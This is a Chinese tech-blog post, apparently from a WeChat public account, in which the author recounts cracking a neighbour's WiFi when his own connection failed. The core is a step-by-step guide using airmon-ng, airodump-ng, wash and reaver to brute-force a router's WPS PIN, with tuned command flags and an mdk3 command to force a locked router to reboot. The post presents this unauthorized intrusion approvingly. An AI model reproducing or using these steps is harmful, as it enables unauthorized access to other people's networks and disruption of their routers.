查看原文
其他

【渗透】我入侵了隔壁妹子的Wifi,发现。。。

冰河 冰河技术 2022-09-10

点击上方蓝色“冰河技术”,关注并选择“设为星标”

持之以恒,贵在坚持,每天进步一点点!



作者个人研发的在高并发场景下,提供的简单、稳定、可扩展的延迟消息队列框架,具有精准的定时任务和延迟队列处理功能。自开源半年多以来,已成功为十几家中小型企业提供了精准定时调度方案,经受住了生产环境的考验。为使更多童鞋受益,现给出开源框架地址:

https://github.com/sunshinelyz/mykit-delay

PS: 欢迎各位Star源码,也可以pr你牛逼哄哄的代码      

写在前面

今天高高兴兴的回到家,打开电脑,我靠,没网!咋回事?连手机热点也贼慢。要不蹭网?下载万能钥匙?果断不能用万能钥匙!因为使用了万能钥匙,自家的Wifi密码也会共享出去。那么,怎么办?这难不倒我,于是,我打开了我的Kali操作系统,瞄准了隔壁妹子的Wifi。

WPA2-PSK加密原理

现在的路由器大多都默认用 WPA2-PSK 方式对无线网络进行加密了,不能再像 WEP  加密方式那样好破解,使用字典又需要费心费力地整理字典,而且字典破解的效率还慢。所以我们需要更有效率的破解方法。好在现在大多数的路由器都提供  WPS 功能,通过这个功能,用户可以使用 PIN 码登录到路由器。但这个 PIN 码的长度只有 8  位,而且可能的取值只有11000种(注意,不是 10^8 种)。所以我们可以进行简单粗暴的穷举 PIN  码破解,而且我们可以推断出这种破解方法在目标 AP 开启了 WPS  功能的情况下是可以百分之百破解它的。这其实是很老的破解手段了,但至今依然奏效。

操作步骤

1.切换无线网卡到监听模式

airmon-ng  start  wlan0

2刺探附近 WLAN 网络(这个命令所跟的参数值可以在 步骤1 完成后从提示信息中查看到)

airodump-ng  wlan0mon

3.找出开启了 WPS 功能、可以使用 PIN码 登录的路由器,并另外记录下该 AP 的 BSSID(约等于该 AP 的 MAC 地址)

wash  -i  wlan0mon

4.开始进行 PIN码 穷举破解(注意末尾的参数是 2 个小写字母 v)

reaver -i wlan0mon -b xx:xx:xx:xx:xx:xx -vv

参数说明:-i 无线网卡名称 -b 目标AP的mac地址 -a 自动检测目标AP最佳配置 -S 使用最小的DH key,可以提高破解速度 -vv 显示更多的非严重警告(注意这是 2 个小写字母 v) -d 即delay每穷举一次的闲置时间 预设为1秒 -c 信道编号 -p PIN码四位或八位 //可以用8位直接找到密码。

破解时推荐使用这个命令:reaver -i wlan0mon -b D8:15:0D:D6:13:92 -a -S -d9 -t9 -vv,因为–d9 –t9参数可以防止pin死路由器。

5.等待破解完成(这个破解可能会时间比较长,和你的目标 AP 有关,隔壁妹子没有网络安全意识,密码很脆弱,只用了几分钟便破解了),这期间我们可以查看到穷举破解花费的时间、预计剩余时间、穷举PIN码进度 信息

6.破解成功

7.成功联网

8.拿下路由器

注意事项

  • 如果在执行 reaver 命令后看到有 WARNING: Failed to associate with  xx:xx:xx:xx:xx:xx 这样的提示信息,那么应该是你选择了一个不具备或关闭了 WPS 功能的路由器。这种情况下就执行wash  命令并重新选择一个路由器吧。

  • 如果在执行 reaver 命令后看到有 warning detected ap rate limiting waiting  60 seconds before re-checking 这样的提示信息,这表示目标路由器开启了防 PIN破解 功能。因为我们是穷举 PIN码 进行破解的,当连续使用超过某个次数的 PIN码 后,路由器会暂时锁定 WPS 功能一段时间。这种情况下要么我们耐心等待其恢复 WPS  功能,要么执行 mdk3 wlan0mon a -a xx:xx:xx:xx:xx:xx  (这是上面的目标AP的MAC地址)命令让路由器主动重启或被动重启以恢复 WPS 功能。

重磅福利

关注「 冰河技术 」微信公众号,后台回复 “设计模式” 关键字领取《深入浅出Java 23种设计模式》PDF文档。回复“Java8”关键字领取《Java8新特性教程》PDF文档。回复“限流”关键字获取《亿级流量下的分布式限流解决方案》PDF文档,三本PDF均是由冰河原创并整理的超硬核教程,面试必备!!

好了,今天就聊到这儿吧!别忘了点个赞,给个在看和转发,让更多的人看到,一起学习,一起进步!!

写在最后

如果你觉得冰河写的还不错,请微信搜索并关注「 冰河技术 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 冰河技术 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 冰河技术 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 冰河技术 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!



如果你喜欢这篇文章,欢迎点赞和转发。

生活很美好,明天见(。・ω・。)ノ♡


您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存